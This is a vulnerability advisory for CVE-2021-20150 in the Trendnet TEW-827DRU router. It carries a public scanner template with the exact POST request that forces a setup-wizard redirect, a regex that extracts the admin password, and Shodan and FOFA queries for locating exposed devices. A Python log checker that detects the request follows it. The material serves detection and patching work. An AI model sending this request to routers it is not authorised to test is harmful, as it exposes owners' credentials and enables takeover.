CVE-2021-20150: Trendnet AC2600 TEW-827DRU - Credentials Disclosure

Date: 2025-08-01 | Affected software: Trendnet AC2600 TEW-827DRU | POC: Public

Vulnerability description

Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.

PoC code [public]

id: CVE-2021-20150

info:
  name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
  author: gy741
  severity: medium
  description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
  impact: |
    An attacker can obtain sensitive credentials, leading to unauthorized access to the router.
  remediation: |
    Update the router firmware to the latest version to fix the vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2021-54
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-20150
    cwe-id: CWE-306
    epss-score: 0.38799
    epss-percentile: 0.97171
    cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: trendnet
    product: tew-827dru_firmware
    shodan-query:
      - http.html:"TEW-827DRU"
      - http.html:"tew-827dru"
    fofa-query: body="tew-827dru"
  tags: cve2021,cve,disclosure,router,tenable,trendnet

http:
  - raw:
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}

        action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ftp_username'
          - 'ftp_password'
          - 'ftp_permission'
          - 'TEW-827DRU'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: password
        group: 1
        regex:
          - '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
        part: body
# digest: 4b0a00483046022100bb98e3c8a73baaf3e221d7c5b687fb8cb08cb233ed6079391fbbbb864f40dc21022100c08ca8f45306272f114f14335bbc3e5e9022f7adaab229b91cc124daf579037e:922c64590222798bb761d5b6d8e72950
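
A log-side check for the request shape the template above sends, as an added example (not part of the original page or the template author's code). It assumes a proxy or sensor in front of the router's management interface records method, path and body; `check_request`, `EXPECTED_PAGES` and the sample records are hypothetical names and constructed data.

```python
from urllib.parse import parse_qs

# Assumption: pages the operator accepts as redirect targets after a wizard
# cancel. Empty by default, so every forced redirect is reported.
EXPECTED_PAGES = frozenset()

REDIRECT_FIELDS = ("html_response_page", "html_response_return_page")


def check_request(method, path, body, expected=EXPECTED_PAGES):
    """Return unexpected redirect targets named by a setup-wizard cancel request.

    An empty list means the request does not match the pattern.
    """
    if method.upper() != "POST" or path.split("?", 1)[0] != "/apply_sec.cgi":
        return []
    # parse_qs percent-decodes names and values, so an encoded form of the
    # same body is still recognised (a plain substring match would miss it).
    form = parse_qs(body, keep_blank_values=True)
    if "setup_wizard_cancel" not in form.get("action", []):
        return []
    targets = []
    for field in REDIRECT_FIELDS:
        for page in form.get(field, []):
            if page not in expected and page not in targets:
                targets.append(page)
    return targets


def flag_records(records, expected=EXPECTED_PAGES):
    """Return (index, targets) for every record that forces a redirect."""
    hits = [(i, check_request(m, p, b, expected)) for i, (m, p, b) in enumerate(records)]
    return [(i, t) for i, t in hits if t]


# Constructed sample records: (method, path, body).
SAMPLE = [
    ("POST", "/apply_sec.cgi",
     "action=setup_wizard_cancel&html_response_page=ftpserver.asp"
     "&html_response_return_page=ftpserver.asp"),
    ("POST", "/apply_sec.cgi",
     "action=setup%5Fwizard%5Fcancel&html_response_page=ftpserver%2Easp"),
    ("POST", "/apply_sec.cgi", "action=other&html_response_page=index.asp"),
    ("GET", "/index.asp", ""),
]

if __name__ == "__main__":
    for index, targets in flag_records(SAMPLE):
        print(f"record {index}: wizard cancel redirected to {targets}")
```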
